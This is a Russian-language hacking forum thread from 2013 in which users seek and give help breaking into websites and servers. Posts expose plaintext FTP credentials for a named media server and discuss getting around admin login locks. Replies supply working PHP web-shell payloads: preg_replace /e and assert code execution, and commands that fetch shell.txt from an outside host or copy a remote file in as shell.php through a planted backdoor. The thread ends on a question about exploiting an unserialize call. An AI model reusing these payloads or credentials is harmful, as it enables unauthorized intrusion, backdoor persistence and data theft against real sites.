Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. liveintrop

    liveintrop New Member

    Joined:
    30 Mar 2013
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Нужен совет, целесообразно ли копать далее в этой области?

    Нужно получить фотки с одного ftp
    host: files.wwe.com случайно наткнуля на страницу там для СМИ давали логин и пароль но доступ они давали строго в одну категорию где особо ничего нужного нет. А теперь вопрос возможно ли как то получить доступ к другим каталогам или хотя бы получить их структуру?

    Информация что имеется
    ftp://ftp517:triple772ftp@files.wwe.com
    Name: ftp517
    Password: triple772ftp
    Host: files.wwe.com

    когда на сайте захожу в какую либо фотку ссыль такая
    http://www.wwe.com/f/styles/photo_large/public/photo/image/2013/04/RAW_1036_Photo_007.jpg

    если убрать /styles/photo_large/public то фотка появляется в чуть большем размере то есть прямой путь к (f) то есть files.wwe.com что и есть host. Просто знаю одного иностранца который имеет доступ к этому серваку но ничего не говорит. И он качает оттуда tiff, dng и так далее куда лучшего качества чем на сайте.

    Вопрос прозвучал ранее есть ли шанс получить доступ к заветным файлам? через данную инфу?
     
  2. zloy_fantom

    zloy_fantom New Member

    Joined:
    3 Dec 2012
    Messages:
    46
    Likes Received:
    0
    Reputations:
    0
    Нарыл на сайте спрятанный пхпинфо, а в нем пасс и логин админа, только админ залогинен круглосуточно, а сайт не позволяет залогиниться с разных ип одному юзеру. Как это можно обойти?
     
  3. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,051
    Likes Received:
    615
    Reputations:
    690
    в phpinfo логин и пасс ? 0_о
     
    _________________________
  4. zloy_fantom

    zloy_fantom New Member

    Joined:
    3 Dec 2012
    Messages:
    46
    Likes Received:
    0
    Reputations:
    0
    Как в том анекдоте про говорящую корову: "Че смотришь? Я сама охуела".
    НО, как я уже сказал, залогиниться под ним не могу. Там-же, кстати еще и куки прописаны, но подставлять пока не пробовал, к тому-же не понятно, админские они или нет, и не залочит-ли их сервер с другого ип, как лочит авторизацию...
    Помогите советом
     
  5. zloy_fantom

    zloy_fantom New Member

    Joined:
    3 Dec 2012
    Messages:
    46
    Likes Received:
    0
    Reputations:
    0
    Подскажите, это:
    passhash=md5(concat(salt,concat(" . sqlesc($password) . ",salt)))
    означает
    md5(md5(salt.pass.salt))
    или
    md5(md5(salt.md5(pass).salt))
    Или нет?
     
  6. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,770
    Likes Received:
    881
    Reputations:
    859
    md5(salt.password.salt)
     
    _________________________
  7. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,770
    Likes Received:
    881
    Reputations:
    859
    Чё за бред ? Быть такого не может...
     
    _________________________
  8. sova1611

    sova1611 New Member

    Joined:
    10 Jan 2009
    Messages:
    31
    Likes Received:
    3
    Reputations:
    0
    короче имеем бэкдор,заходил раньше через ?e=eval(base64_decode(ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3NpdGUucnUvc2hlbGwudHh0JykpOw)); (код base64 изменил),саты переехали на другой серв,сейчас быкдор так же есть ,проверял через ?e=phpinfo(); ,но уже в шел не попадаю(так каак стоит disable_functions
    PHP:
    eval, execsystempassthruscandirpopenshell_execproc_openproc_closeproc_niceget_current_usergetmyuidposix_getpwuidapache_get_modulesvirtualposix_getgrgidgetmyinodefileownerfilegroupgetmypidapache_get_versionapache_getenvapache_noteapache_setenvdisk_free_spacediskfreespacedlini_restoreopenlogsysloghighlight_fileshow_sourcesymlinkdisk_total_spaceini_get_allget_current_userposix_uname
    тоесть eval отключён( как теперь можно попасть в шел)
     
  9. zloy_fantom

    zloy_fantom New Member

    Joined:
    3 Dec 2012
    Messages:
    46
    Likes Received:
    0
    Reputations:
    0
    Поверьте, там есть данные:
    [​IMG]
     
  10. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,399
    Likes Received:
    883
    Reputations:
    859
    Попробуй так:
    ?e=preg_replace("/.*/e","phpinfo();",".");

    P.S: Как такавой функция preg_*(); может полностью вам заменить eval(); вам остается только синтаксис разобрать!
     
    _________________________
    #22050 winstrool, 4 Apr 2013
    Last edited: 4 Apr 2013
  11. sova1611

    sova1611 New Member

    Joined:
    10 Jan 2009
    Messages:
    31
    Likes Received:
    3
    Reputations:
    0
    выдало Hacking attempt! а на другом бэкдоре выдало phpinfo

    а вот ?e=preg_replace("/.*/e","file_get_contents('http://site.ru/2.txt');",".");


    не обработало ни на одном(
     
    #22051 sova1611, 4 Apr 2013
    Last edited: 5 Apr 2013
  12. sova1611

    sova1611 New Member

    Joined:
    10 Jan 2009
    Messages:
    31
    Likes Received:
    3
    Reputations:
    0
    это твои куки)))
     
  13. KolosJey

    KolosJey Member

    Joined:
    21 Dec 2009
    Messages:
    45
    Likes Received:
    42
    Reputations:
    48
    Я тебе открою страшную хакерскую тайну, только никому не говори!

    Админ там мудак. Таким образом eval не отключается, тоесть ей пофиг эта директива, а почему так, можно будет узнать если кушать манную кашу и читать хоть что то по теме, а не давать советы (постоянно не в тему, прошу заметить ))).
     
  14. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,051
    Likes Received:
    615
    Reputations:
    690
    ага и такое бывает http://forums.devshed.com/php-development-5/phpinfo-shows-my-password-246249.html
    ты же залогинен на сайте именно под этим логин пассом так ? или там вместо пасса хеш сумма.
    P.S или это кривость рук админа с настройками вебпанелей, в любом случае такого не должно быть и это не правильно.
     
    _________________________
    #22054 shell_c0de, 5 Apr 2013
    Last edited: 5 Apr 2013
  15. zloy_fantom

    zloy_fantom New Member

    Joined:
    3 Dec 2012
    Messages:
    46
    Likes Received:
    0
    Reputations:
    0
    В общем все было несколько иначе, просто я, когда писал, решил упростить.
    Я прочитал скрипт memcache.php, в котором были логин и пасс в явном виде, потом запустил его, скрипт затребовал авторизацию, я ввел данные и просмотрел предложенные данные, ничего интересного не нашел, открыл индекс, он показал мне, что я не сервере НЕ ЗАЛОГИНЕН, т.е. авторизация к memcache.php происходит в обход базы данных (тупо сравниваются введенные данные со строкой в скрипте). После этого я открыл пхп инфо, согласен, скорее всего куки, логин и пасс перешли туда из моей сессии. Попозже проведу более чистый эксперимент. Куда копать понял.
    Но что мне делать с этим админом, который постоянно залогинен, ведь я даже не знаю, совпадает-ли этот пароль с паролем от сайта....
     
  16. sova1611

    sova1611 New Member

    Joined:
    10 Jan 2009
    Messages:
    31
    Likes Received:
    3
    Reputations:
    0
    как я понял решения под мою проблему нет?фильтрует dle кавычки(
     
    #22056 sova1611, 5 Apr 2013
    Last edited: 5 Apr 2013
  17. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    162
    Likes Received:
    6
    Reputations:
    1
    Что за люди ленивые пошли я в ах**у,ты пока флудил тут уже решение нашел бы.У тебя ограничения мизерные вариантов море как залиться.
    Исполнял аплоадеры который запросто залазят а get-запрос,тебе выше сказали юзай preg_replace если не получается ей исполнить код читай ман по ней,юзай вместо eval функцию assert
     
  18. sova1611

    sova1611 New Member

    Joined:
    10 Jan 2009
    Messages:
    31
    Likes Received:
    3
    Reputations:
    0
    через preg_replace шел не заливается так как фильтруются кавычки,пробывал preg_replace("/.*/e","copy('http://site.ru/1.txt','shell.php');","."); ,проверял на другом всё норм,assert тоже не сработало(может не правильно составил запрос(

    print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go_up></form></form>

    тоже не помогло(
     
    #22058 sova1611, 5 Apr 2013
    Last edited: 5 Apr 2013
  19. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    162
    Likes Received:
    6
    Reputations:
    1
    Code:
    фильтруются кавычки,пробывал
    А preg_replace(base64_decode('')); религия не позволяет?

    Че там у тебя может не получиться?
    assert(file_get_contents('http://site/shell.txt'));
     
  20. m1d$

    m1d$ New Member

    Joined:
    30 Mar 2013
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    $terms = $input->request->get('highlight', null, 'base64');
    $terms = $terms ? unserialize(base64_decode($terms)) : null;
    как можно использовать в "своих" целях?
    файл highlight.php
     
Thread Status:
Not open for further replies.